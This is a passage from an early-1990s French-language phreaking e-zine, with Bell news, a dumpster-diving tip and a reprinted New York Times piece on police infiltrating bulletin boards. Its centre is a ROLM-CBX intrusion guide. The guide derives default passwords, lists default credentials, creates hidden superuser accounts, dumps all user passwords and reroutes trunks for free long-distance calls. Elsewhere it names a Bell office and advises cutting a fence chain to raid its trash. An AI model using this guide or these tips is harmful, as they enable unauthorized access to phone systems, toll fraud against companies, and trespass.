les fonctions disponibles via DATAPAC (Tymnet, ect...) Goodbye and
see ya in the next issue!


[Blitz- Come on, Fairy! Tu es capable de nous faire quelque chose
de plus consistant la prochaine fois!]




ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

LES DATAPACs? C'EST A NOUS CA?!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



TRASHING BELL STYLE

OU

LA SEMAINE VERTE

par

-=ThE PoSSe=-


Quelques nouvelles brŠves sur le Bell et sur le phreak, comme ‡a,
en passant...
---------

Comme vous le savez si bien, NpC fr‚quente seulement l'‚lite
internationale. Par hasard, un certain vendredi, lorsque nous
‚tions en train de nous procurer notre ration bi-mensuelle de sacs
verts, nous f–mes surpris de rencontrer le pr‚f‚r‚ de tous. Un mec
sympathique, coiff‚ d'une tuque de la mˆme couleur que nos sacs.
Vous avez s–rement tous reconnu Jon Bon Jovi. Comme quoi le
trashing conduit … la c‚l‚brit‚...Keep the faith.


----------------

Bell a instaur‚ un programme de reconnaissance et service, appel‚
"LE CINQ TOILES", pour r‚compenser, antre autres, les bons coups
de leurs employ‚s. Quel genre de bon coup, me demanderez-vous:
voici quelques exemples...

INSTALLATION ET RPARATION - SUD-OUEST

Steven Ligety, technicien -service d'affaires I

A la suite d'une conversation avec une employ‚e d'un
‚tablissement en s‚rieuse difficult‚ financiŠre, Steven a jug‚ …
propos de communiquer l'information au groupe de la Perception -
march‚ d'affaires. Une r‚action imm‚diate s'ensuivit, qui permit de
percevoir des sommes de l'ordre de 10 000 $ en un temps record et
d'obtenir des garanties. Le jugement de Steven a donc prot‚g‚ les
revenus de Bell.

[Quand on vous disait que la d‚lation, certains avaient ‡a dans le
sang! -Blitz]

VENTE ET SERVICE -MARCHE D'AFFAIRES - SUD-OUEST

Marc Lapointe, repr‚sentant en communications

La direction du groupe Perception Nord-Est tenait … f‚liciter
Marc pour sa perspicacit‚. Et pour cause! Jugez-en sur les propos
suivants:
"En f‚vrier '92, Marc n‚gociait une demande de d‚m‚nagement
ainsi que l'installation d'un systŠme t‚l‚phonique pour un client.
Une fois les efforts d‚ploy‚s et la vente conclue, il re‡oit un
chŠque de d‚p“t de 3 500 $. Ayant des doutes sur la solvabilit‚ du
client, Marc a communiqu‚ avec la perception. Un appel … la banque
du client a confirm‚ qu'il n'y avait pas d'argent dans le compte de
banque. Marc a d– annuler la commande ainsi que sa vente".
Marc a prouv‚ que mˆme si les ventes repr‚sentent la nature
mˆme de ses fonctions, la protection des revenus est d'une ‚gale
importance.

[Bon sang! Ils ont ‚rig‚ ‡a en systŠme! -Blitz]

ASSISTANCE-ANNUAIRE

Denis Castonguay, assistant au service rempla‡ant (87 Ontario)

Denis a contribu‚ … d‚masquer un r‚seau de jeunes fraudeurs
qui, … l'aide d'un ordinateur, s'introduisaient dans des boŒtes
vocales de Bell et d'Hydro-Qu‚bec pour ensuite en ressortir et
faire des appels d'urgence fictifs au 9-1-1 ou des appels outre-
mer. Faisant preuve de doigt‚, il leur a fait d‚voiler certains
d‚tails qui ont par la suite permis au groupe de la S–ret‚ de
remonter la filiŠre, d'‚tablir des preuves et d'aviser les parents
avant de d‚manteler ce r‚seau. Bel exemple de perspicacit‚.

[Bel exemple de connerie, oui! Qu'avaient donc ces pirates …
discuter avec un op‚rateur du Bell? Ce sont des couillons qui
m‚ritaient de se faire pincer, tiens! -Blitz]

TOPS B

Nancy Allaire, t‚l‚phoniste, Maurice B‚liveau, conducteur semi-
remorque (mat‚riel), Guy Delorme, monteur de lignes, Manon Filion,
t‚l‚phoniste, Sylvain Henry et Michel Y. Laveault, r‚parateurs de
cƒbles, et Robert Rajotte, technicien -service d'affaires I

Dans le cadre de la journ‚e "Kino de l'entreprise" se tient
une parade de chars all‚goriques mettant en valeur les diverses
activit‚s r‚alis‚es par les entreprises de la r‚gion de
Victoriaville. Grƒce … nos sept b‚n‚voles, et ce pour la premiŠre
fois, un char illustrant les divers services rendus par Bell … ses
clientŠles participe au d‚fil‚ et remporte le prix du plus beau
v‚hicule all‚gorique.

[Nul doute qu'on a d– parader les fraudeurs et les mauvais payeurs
sur ce char, attach‚s … un pilori: il faut bien illustrer les
services du Bell! -Blitz]

On arrˆte l… cette description tir‚e de la revue "Le cinq toiles"
(r‚dig‚e par Brigitte Roberge), parce que je crois que je vais me
mettre … pleurer...


--------------------

Pour les plus furieux trashers d'entre vous, voi‡i notre meilleure
adresse: 175 St-Sacrement... C'est le bureau de Bell responsable de
l'installation dans toutes les places d'affaires, et des
t‚l‚phones, et des systŠmes-voix, et des PBX... Des poubelles en
or!
Mais... la place est cl“tur‚e, ‚clair‚e, un peu inqui‚tante, quoi.
Vous n'y couperez pas, les kids, ou plut“t si, vous allez devoir
couper la chaŒne qui ferme la porte grillag‚e de la cl“ture, si
vous voulez y avoir accŠs. Mais ‡a en vaut la peine: en une seule
rafle, nous avons mis la main sur des ‚quipements bris‚s, les
manuels de tous les systŠmes t‚l‚phoniques que le Bell vend aux
compagnies, etc.

A vous de juger si le jeu en vaut la chandelle...

------------------

Mine de rien, sans en parler … personne (sneaky guys!), Bell a
d‚cid‚ de baisser le seuil de tol‚rance de ses factures impay‚es.
Le CTRC a accept‚ que Bell r‚clame des int‚rˆts pour des factures
de 20 $ depuis le d‚but de f‚vrier, au lieu du 50 $ qui ‚tait le
seuil pr‚c‚dent. Le saviez-vous?



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

ON N'A PLUS DE SECRET POUR VOUS. FORCEMENT...
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



LES PBX PASSENT AU DIGITAL

ROLM-CBX

By Silicon Phreaker / UPI



0.00

-= DCLARATION =-

Ce fichier contient des informations qui ne devraient ˆtre
consid‚r‚es qu'… titre indicatif. Je ne saurais encourager
l'application de ces techniques, car elles sont ill‚gales. Je ne
saurais donc assumer aucune responsabilit‚ … propos de
l'utilisation de ces informations.

-= FIN DE LA DCLARATION =-


0.50

- Table des MatiŠres -

D‚claration.............................................. 0.00
Table des MatiŠres....................................... 0.50
Introduction............................................. 1.00
Ce qu'est un CBX......................................... 1.10
P‚n‚trer dans un ROLM CBX................................ 1.20
Que peut-on faire une fois … l'int‚rieur?................ 1.30
Utiliser l'interface de configuration interactive (ICI).. 1.40
Acc‚der … la liste des Trunk............................. 1.50
Acc‚der … la liste des Usagers........................... 1.60
Cr‚er de nouveaux Acomptes............................... 1.70
Acc‚der … la liste du Hardware........................... 1.80
Acc‚der … la liste des Lignes Data & Setup............... 1.90
Conclusion............................................... 2.00


1.00

- Introduction -

Salut les potes! Bienvenue dans ce guide des ROLM-CBX. Une partie
de ce texte (principalement les mots de passe standards) provient
de l'intro d'un T-file ‚crit par Tracer. Il faut donner le cr‚dit
l… o— il est d–.
La raison qui m'a pouss‚ … ‚crire ce texte? Je considŠre qu'il n'y
avait pas encore eu un bon texte sur les ROLM-CBX, un long texte
qui couvrirait vraiment l'ensemble du sujet.
Alors, le texte qui suit peut ˆtre consid‚r‚ comme une somme en la
matiŠre, … d‚faut de poss‚der le manuel original. En esp‚rant que
vous le trouviez pratique et qu'il puisse vous donner un coup de
main lors de votre prochaine incursion dans le "cyberspace"...

1.10

- Ce qu'est un CBX -

CBX veut dire "Computerized Branch Exchange". En d'autres mots,
c'est un PBX qui fonctionne … partir d'un ordinateur.
Habituellement, un CBX pourra contr“ler, au choix, un PBX local o—
pour les longues distances, ainsi que toute une vari‚t‚ de
services, comme la messagerie vocale et le systŠme t‚l‚phonique de
la compagnie … l'interne.
Le CBX peut aussi ex‚cuter toute une s‚rie de commandes standard,
comme les renvois d'appel, les dial-in et les dial-out. Un usage
possible du CBX, par exemple, peut ˆtre de le programmer afin qu'il
effectue un renvoi d'appel vers un PBX longue-distance … partir
d'un dial out.
En bref, les possibilit‚s qu'offre un CBX … tout bon hacker ne sont
d‚finies que par les limites de son imagination.


1.20

- P‚n‚trer dans un ROLM-CBX -

Quand vous entrez et que vous loggez sur un tel systŠme, voici la
premiŠre chose que vous apercevez en en-tˆte:


ROLM CBX SITE ID: SEARS31332
RELEASE: 9004.4.20 BIND DATE: 19/DEC/88
COPYRIGHT (C) ROLM CORPORATION, 1987
ALL RIGHTS RESERVED - PROPERTY OF ROLM CORPORATION
03:34:55 ON MONDAY 6/22/1992 33 DEGREES C


Lorsque le systŠme demandera le nom d'usager, entrez: ENG

Maintenant, pour trouver le mot de passe par d‚faut (standard),
prenez le jour du mois de l'en-tˆte (22), ajoutez-y le num‚ro de
node (habituellement 1), plus le premier chiffre de la minute (ici
0). Dans le cas pr‚sent, le total est 23. Utilisez le dernier
chiffre de ce total (3) en le pla‡ant comme le premier chiffre du
mot de passe. Ajoutez maintenant les caractŠres suivants (WID), le
num‚ro du systŠme (ici 31332) et la premiŠre lettre du mois courant
(F).

Dans le cas pr‚sent, le mot de passe devrait ressembler … ‡…:

3WID31332F

Si cette technique arcane, mais authentique ne fonctionne pas pour
vous, essayez le truc suivant.


USERNAME: SU
PASSWORD: SUPER

ou

USERNAME: SYSADMIN
PASSWORD: ROLM ou ROLM-VLCBX ou SYSADMIN


1.30

- Utiliser le CBX -

Le prompt pour un CBX va comme suit :

%.

La commande pour acc‚der au Help est : ?

Le Help devrait vous pr‚senter la liste des commandes suivantes :


ABORT ACTIVATE ATTR BYE
CANCEL CARD CDRSM CDT
CHANGE CHG CLEAR CLR
CMPCT CMSTS CNCL CNFG
CONVERT COPY CPEG CTMON
CTRA CTRTL CXCLR COPY
CXCLR CXCON CXNET DACK
DADD DAEVT DANS DBDMP
DCAT DCF DCOM DDMA
DDQ DDT DE
DEACTIVATE
DEFINE DELETE DEMOUNT DESUM
DEX DFACK DFCOM DFEAT
DFEVT DHTQ DHWS DIAG
DIQ DISABLE DIWQ DKQ
DML DMNT DMS DMTST
DOWN DPATR DPMR DPMS
DPPRI DPTR DQQ DRCT
DREGS DSBLE DSQ DSST
DSTAK DTCB DTDQ DWQ
DX_TR ENABLE ENB ENBLE
ETIO EX EXM EXN
EXP EXPAND FINIT FORMAT
FREER FSD GTOD HDBST
HELP INSTALL KPFA LCT
LIST LOAD LOGOFF LOGON
LPEG LPKT LSCT LSL
LST LTCB MNT MONITOR
MOUNT MTRACE NEXT NSTAT
PAGE PCNFG PDIO PFA
PKTS PLIST PLTT PPFA
PS PSH QAT QITM
QTEST RCT RECEIVE RENAME
REPLY RESTART RESTORE REVERSE
RM RMOFF RPFA RSC
RSCLK RSTOR RSTRT SAT
SCAN SEND SETD SHOW
SITM SOCON SOUNC SSAT
START STATE STATUS STEST
STOD STOP STRT STS
TDCD TEST TKSTS TRTL
TST TX UNLK UNLOCK
UP VERIFY XDEF XMIT
XPND

Toutes ces commandes peuvent ˆtre plac‚es … partir du prompt %.
Certaines pourrait, d‚pendant de la configuration du systŠme, ˆtre
hors d'usage, ou pourraient ne pas ˆtre, tout simplement,
disponibles, si vous n'ˆtes pas en mode diagnostic (DIAG).

Nous allons maintenant porter notre attention sur l'interface de
configuration interactive (ICI), qui joue une part vitale dans le
fonctionnement du CBX.


1.40

- Utiliser le ICI -


Au prompt, entrer la commande CNFG.

% CNFG

Une en-tˆte va apparaŒtre. Elle devrait ressembler … ceci :


CBX/9000
INTERACTIVE CONFIGURATION INTERFACE


15:14:32 ON MONDAY 6/22/1992
COMMAND:


Ceci est le prompt principal. Si vous ex‚cutez la commande ? , vous
allez obtenir la liste des fonctions suivantes :

MODIFY, CREATE, LIST, CHECK, EXIT, DONE, RESET, REBUILD.

En entrant une de ces commandes, vous allez obtenir le prompt
suivant :

NOUN:

Vous pouvez alors entrer "?" ou "ALL", qui jouent le r“le de
"wildcard". Une liste des fonctions de configuration devrait
apparaŒtre :


BUTTON_120 BUTTON_240 CDR_EXCLUDE
CNFG_ERRORS
CNFG_QUEUE CNFG_STATUS CNFG_USERS
COM_GROUP
COS_FEAT DATA_ESS DATA_DEVICE
DATA_GROUP
DATA_LINE DATA_SUBMUX DLI ETS
EXTEN FAC FAC_TYPE FAMILY
FEAT_CODE FIRST_DIGIT HD_GROUP LEX
LOGON_PROFILE MAP MEM_PARTS PARAM
PICK POWER Q_TYPE ROUTE_LK
RP RPD RPI
RPS_120S_ON
RPS_240S_ON SAT_NAME SEARCH_SEQ SECTION
SECURITY_GROUP SERVICE_LIST SIO_PARTS SLI
SPEED T1D3 T1D3_GRP TRUNK
TRUNK_GROUP VPC


% CREATE LOGON_PROFILE
ENTER NAME (1-12 CHAR): TEST
ENTER PASSWORD: TEST
RETYPE: TEST

Ensuite, le systŠme va vous demander un nom de "famille". Si vous
voulez obtenir un accŠs "SuperUsager", tapez

"SYSTEM_ADMIN"

AprŠs, la machine devrait maintenant vous demander un "verbe". Les
verbes sont les fonctions, ou commandes, que l'usager identifi‚
dans la "famille" peut utiliser. Des flags en quelque sorte...
Toujours pour votre futur acompte "SuperUsager", entrez "SU" pour
avoir accŠs … toutes les commandes.

Pour obtenir une liste des usagers online au moment de votre appel,
essayez ceci:

% LIST CNFG_USERS
NUMBER OF USERS MAX NUMBER OF USERS
3 5

PORT USER_NAME START_TIME HOW_LONG
17 SU 17:47:57 0:28:34
2 FIELD 18:16:03 0:0:28
3 MARYB 18:16:03 0:10:03


1.50

- Acc‚der … la liste des Trunks -

En tout premier lieu, vous n'aviez bien s–r appel‚ sur ce systŠme
que pour utiliser le PBX, et non pas pour vous promener sur le
systŠme ou pour vous cr‚er des acomptes. Eh bien, vous allez ˆtre
servi! Pour obtenir le listing des trunks qui donnent accŠs au PBX,
vous faites cette simple commande, … partir du prompt du ICI :

COMMAND: LIST
NOUN: TRUNK
PAD: ALL

Vous allez avoir toute une s‚rie d'informations diverses, la
plupart de celles-ci concernant les num‚ros de nodes et les
secteurs. Il vous faut en fait chercher, dans ce fouillis, une
information semblable … celle-ci :

TRUNK IDENTIFICATION NAME
------------------------------ ----------------
DS RJ 2/11 352-0515 CO

START END CHECKS PASS INTCEPT
TIME TIME ACT FAC WORD EXTN
----- ----- - - ---- -------
DS 00:00 23:59 N N 1357 255

Prenez en note le num‚ro d'identification du Trunk ainsi que son
code, et vous avez maintenant un PBX qui n'attend que vos ordres...


1.60

- Acc‚der … la Liste des usagers -

Maintenant, vous voulez trouver un acompte pour un de vos amis?
Facile comme bonjour! Voici comment :

A partir du ICI, faites :

COMMAND: LIST
NOUN: LOGON_PROFILE
PAD: ALL

Vous allez obtenir la liste complŠte des acomptes existants, avec
les mots de passe et la liste des privilŠges pour chacun.


1.70

- Cr‚er de nouveaux acomptes -

% CREATE LOGON_PROFILE
ENTER NAME (1-12 CHAR): ACCOUNT_NAME
ENTER PASSWORD: PASSWORD
RE-TYPE PASSWORD: PASSWORD
VERB: ALL

Cette s‚rie de commandes vous permet de cr‚er un acompte
"Superusager" avec un accŠs TOTAL au systŠme.


1.80

- Acc‚der … la liste du Hardware -

Vous ˆtes probablement en train de vous demander: "Pourquoi est-ce
que je devrais m'emmerder avec le matos du systŠme", right? Que
diriez-vous d'avoir un dialout … 9600 bauds? Cool, non? Peu
importe, je vais vous montrer comment avoir accŠs au systŠme, mais
vous allez devoir vous d‚brouiller par vous-mˆme pour rediriger le
modem du systŠme. Je n'ai pas le temps ni les connaissance
n‚cessaires sur le ROLM-CBX pour vous le montrer avec certitude.
Alors, voici pour avoir la liste du hardware...

Vous entrez la commande suivante, toujours du ICI :

% LIST DATA_DEVICE
PAD: ALL

Vous allez imm‚diatement obtenir la liste de tous les modems et de
tous les terminaux branch‚s sur le systŠme. En utilisant la
commande MODIFY, vous devriez normalement pouvoir vous d‚brouiller
pour changer le setting du modem pour qu'il puisse composer …
partir du num‚ro de PBX que vous avez trouv‚ plus t“t.


1.90

- Acc‚der aux lignes Data et Setup -

Une des hypothŠses sur lesquelles j'ai travaill‚ est la suivante:
Comment peut-on rediriger une ligne de la compagnie vers un num‚ro
LD? J'ai trouv‚ la r‚ponse...

% LIST TRUNK
PAD: ALL

Cette commande va vous donner la liste des trunks. Ensuite, vous
faites :

% MODIFY TRUNK
NOUN: <Le trunk choisi>

Ensuite, entrez toutes les options que vous d‚sirez. L'une de
celles-ci sera un renvoi d,appel vers un autre num‚ro, LD si
possible. En fait, programmez ici votre num‚ro de BBS LD ou de
communication vocale, de fa‡on … ce que la connexion soit toujours
automatique. Votre appel vers ce num‚ro sera d‚sormais gratuit...


2.00

- Conclusion -

Ceci ‚tait mon premier, et probablement mon dernier, texte sur le
phreaking pur et dur. Alors, amusez-vous, et surtout rappelez-vous:
si vous ne r‚ussissez pas du premier coup... essayez encore. Vous
pourrez toujours cracker un systŠme si vous y mettez assez
d'efforts.

Si vous avez un problŠme, une suggestion, ou un beau petit truc …
me communiquer sur les ROLM/CBX, appelez mon board :

The Dialup
514-XXX-XXXX (d‚sol‚, vous devrez demander autour de vous pour le
num‚ro -Blitz)
1200 to 14.4k v32/bis
NUP: CYBERNETIC LSD

UPI East Coast Site
NPC Site

Ou appelez ma VMB (Sujet … changement)

1-800-521-2070 *168 (Si vous n'entendez pas du reggae ou un beat
d'enfer, ce n'est pas la mienne)

Et souvenez-vous: Les Fonecos ont ANI et vont, si elles le peuvent,
l'utiliser pour vous botter le cul jusqu'en prison! Vous allez vous
retrouver sur la paille humide des cachots tellement vite que vous
ne saurez jamais ce qui s'est pass‚! Paix et Anarchie!

Greetings: Mechanix (pour m'avoir introduit aux CBX), Telephatic
Slayer, The Lost Avenger, Arch Bishop, Ratpack (fine AE system you
got), G0DMOTHER, Rock Steady, The Darkman (O— que tu sois. Je sais,
mais...), Atreid Bevatron et toute la gang de NPC, Tracer (pour son
fichier original sur les CBX), et tous ceux que j'aurais pu
oublier...

Grunts: Avis … tous les NARCS qui lisent ceci: o— croyez-vous que
‡a vous conduit, tous vos enfantillages? Au nom du ciel, essayez de
penser … l'impact de vos petites vendettas personnelles contre les
membres de la communaut‚ H/P. Vous croyez que vous ˆtes un dur
parce que vous avez r‚ussi … faire d‚raper ce pirate-ci ou celui-
l…? Comment vous sentiriez-vous si quelqu'un vous traitait de la
sorte? Probablement ben mal... Nous devons travailler en ‚quipe, et
ne pas partir de guerre les uns contre les autres.

Silicon Phreaker / UPI. Word Up.

[Traduction: Blitzkreig]


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÛÛÛÛÛÛÛÛÛÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛ ÜÜÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛß ÜÛÛÛÛßßÛÛÛÛÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ßÛÛÜ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÜ ÛÛÛÛÛÛÛÛÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛ ÜÛÛÛÛ ÛÛÛÛÜ ÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ
ÛÛÛÛÛÛÛÛÛßß ßßÛÛÛÛÛÛßß ÛÛÛÛ ÛÛÛÛ

POUR MIEUX VOUS SERVIR, NOUS PROCEDONS A UNE AUGMENTATION
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ



READ THE NEWS, DON'T BELIEVE THE HYPE

L'actualit‚ dans les m‚dias

par
-=ThE PoSSe=-





Leeched from LA PRESSE - Le samedi 13 f‚vrier 1993


DIEU RE€OIT-IL DES FAX?

Associated Press -J‚rusalem-
Des centaines de personnes ont envoy‚ par fax des messages … Dieu
par le biais d'une compagnie de t‚l‚phone isra‚lienne, en d‚pit des
avertissements d'un rabbin pour qui l'envoi de messages ne remplace
pas la priŠre.
"Nous avons re‡u entre 100 et 200 demandes par jour pour
placer des messages dans le Mur des Lamentations" depuis l'entr‚e
en vigueur de ce service, pr‚cise un porte-parole de la compagnie
nationale.
Le rabbin Yehuda Getz, responsable du Mur des Lamentations, a
averti que les messages par fax ne dispensaient pas les fidŠles de
prier.
Les messages sont envoy‚s sur un num‚ro de fax … J‚rusalem o—
un employ‚ de la compagnie les collecte, les apporte chaque jour au
Mur des Lamentations et les place dans les fissures. La plupart
proviennent de pays ‚trangers. (Le num‚ro, payant, est le suivant:
972-2-612222)

-30-

[Blitz- En passant, je me suis renseign‚ et le service est gratuit.
Vous ne payez que le LD... et encore. Une question, cependant: si
j'utilise un PBX HACK ou un num‚ro de carte d'appel VOLE pour
demander une faveur … Dieu, est-ce que je vais me ramasser en
ENFER? J'angoisse, l…!]




Leeched from TNE NEW YORK TIMES, 26 janvier 93


GOING UNDERCOVER IN THE COMPUTER UNDERWORLD

Law-Enforcement Officiers Quietly Tap Into the Illegal Activities
of
Cyberspace

by Ralph Blumenthal


He patrols the back alleys of cyberspace at the edge of the
electronic frontier. Traveling on beams of electrons, he is
invisible, formless - the ultimate undercover agent.

He's "Phrackr Trakr" of the High-Tech Crime Network. But don't
look for him in comic books or the video store. He's real.

His beat takes in the thousands of computer bulletin boards
where anyone with a computer, a modem and a phone can dial up and
exchange information, or even start a new bulletin board. Usually,
the subject is as innocuous as a computer game program, a receipe
or pet grooming. But increasingly, the authorities say, the
bulletin boards have become underground marketplaces for stolen
telephone access codes and credit card numbers, along with child
pornography and other contraband. Now, law-enforcement agencies
have stepped up counterattacks, including computer-based stings.

That's the passion of Phrackr Trakr, (pronounced FRACK-er
TRACK-er), an organized-crime investigator, founder of a network of
police computer buffs that now spans 28 states, and self-proclaimed
scourge of "hackers" who break into computer networks, "phreakers"
who steal telephone services, and "phrackers," who are a
combinaison of both.

In his newsletter called "FBI" (Find um, Bust um, Incarcerate
um), he warned:
"Every move you make,
Every breath you take,
We'll be watching you."

Brazenly, he uploaded the taunt onto bulletin boards in June in
an effort, as he wrote, to sow "anarchy, chaos, mistrust and fear"
in the "phracker community."

Boyish, with closely cropped hair and a penchant for suspenders
and rakish double-breasted suits, the 36-year-old investigator
works in the organized crime, racketeering and narcotics bureau of
a large law-enforcement agency in the East.

Like other undercover agents whose success and safety hinge on
an ability to blend in with their targets even though they chafe at
the anonymity of their work, he was eager to draw attention to his
operations, provided his identity was withheld.


An Electronic Wall
~~~~~~~~~~~~~~~~~~
While infiltrating electronic bulletin boards, and
investigating computer crime is part of his job, he said, the
High-Tech Crime Network that he organized last year to educate
other officiers around the country is his own project, for which
he has spent some $4,000 of his own money on computer equipement
and phone bills.

Though his investigations have yet to yield arrests, he said he
is studying nine boards and building cases with officiers in three
other states.

"It takes time," he said. "You don't just buy one thing and
arrest them. They'd know you were a cop. You buy things over time
and make several arrests." While the Secret Service and the Federal
Bureau of Investigation are also conducting investigations, he
said, local law enforcement also has jurisdiction.

Others corroborated his account. His information jibes,
furthermore, with well-documented efforts by law-enforcement
agencies nationwide to penetrate the perhaps 10 percent of the
nation's estimated 30,000 electronic bulletin boards where computer
criminals traffic in stolen information, child pornography, poison
recipes and bomb-making instructions.

"I want to make cops aware of high-tech crime," he said as he
typed at a home computer recently reading his electronic mail from
other officiers and leaving messages on bulletin boards that
offered stolen credit card numbers and telephone calling codes.
These were not pranks of teen-age computer whizzes, he said, "This
is an organized criminal activity."

"The victims are everybody," he said. "We all end up paying for
it."

Richard Petillo, manager of corporate security for AT&T, said
such fraud now costs the industry, and thereby customers, an
estimated $2 billion a year and continues to grow. "It's an
epidemic, let's face it," he said. "Criminals are constantly
working at ways to get around our controls. We liken it to a chess
game."

Bruce Sterling, a chronicler of the computer wars and author of
"The Hacker Crackdown" (Bantam, 1992), concluded that while
mischievous intrusions into computer networks were declining,
"electronic fraud, especially telecommunications crime, is growing
by leaps and bounds." This despite a crackdown by several agencies
around the nation in 1990 (Operation Sun-Devil) that resulted in
the seizure of some 40 computers and 23,000 floppy disks.


Threat to Phone Companies
~~~~~~~~~~~~~~~~~~~~~~~~~
To telecommunications giants like AT&T, M.C.I. and Sprint, the
primary fraud is theft of long-distance calling-card numbers. But
they have the technology to detect sudden changes in customer
calling patterns and can invalidate a card within hours. More
difficult to detect are break-ins to a company's phone system -
called a private branch exchange, or PBX. These thefts can afford
free outside calling at the company's expense and can escape notice
until the bill arrives. Among recent victims were the financially
struggling New York Post, which suffered a $40,000 loss.

Toward the end of a month, as the likelihood of their detection
rises, "phreakers" often post PBX access codes on electronic
bulletin boards, allowing wider exploitation and muddying the trail
for investigators. The techniques for such electronic break-ins are
widely disseminated on the bulletin boards.

In addition, many experts say, the more secretive boards have
become forums for pedophiles and other sexual predators who also
inhabit cyberspace, that unfixable geography where disembodied
strangers known only by their pseudonyms, or "handles," chat by
computer and phone lines. Pornography, even moving pictures from
overseas, are stored as files that can be dowloaded by minors into
home computers at will.

Chief Alfred O. Olsen of the Warwick Township Police Department
in Litiz, Pa., who has worked with the police high-tech crime group
and its founder, said in a recent report that he became aware of
the nefarious uses of some bulletin boards as a result of a rape
case in which the suspect met victims through a computer bulletin
board.

To get onto a bulletin board, a computer user needs only a
communications program like Crosstalk and a modem that will send
and receive signals over the phone line. Each board has its own
phone number and is usually maintained by its originator, a system
operator who sets the rules for access and coordinate the message
traffic. Each board commonly offers the phone numbers of many other
boards, as well as programs for starting yet other boards. But
so-called underground boards offering illicit services require
secret passwords, usually granted only to those who attend
face-to-face meetings intended to weed out the police.

The Limits of Expression
~~~~~~~~~~~~~~~~~~~~~~~~
Computer civil-libertarians like the Electronic Frontier
Foundation counter that the police typically have difficulty
differentiating between criminal schemes and constitutionaly
protected free speech.

But Phrackr Trakr said he understood the distinction. "If you
want to write how to kill your parents, that's O.K.," he said,
citing a bulletin board "phile" on how to dispose of a murdered
parent's body. "But selling credit cards is something else."

Learning the idioms was the first step in infiltrating a
bulletin board system, he said. He used a software program on an
IBM clone and a telephone modem to log onto one of several
clandestine boards; he did this by using false identification and
access passwords he had acquired by satisfying a series of
questions testing his authenticity.

He was scanning the messages when the systems operator who
policed the board broke in:"What's up need any help?"

"Yo dude," he typed out, "looking fer ATT's got any?"

The operator provided the handle, or nickname, of someone who
might have credit-card calling numbers.

Phrackr Trakr left a message for him and addressed the
operator.

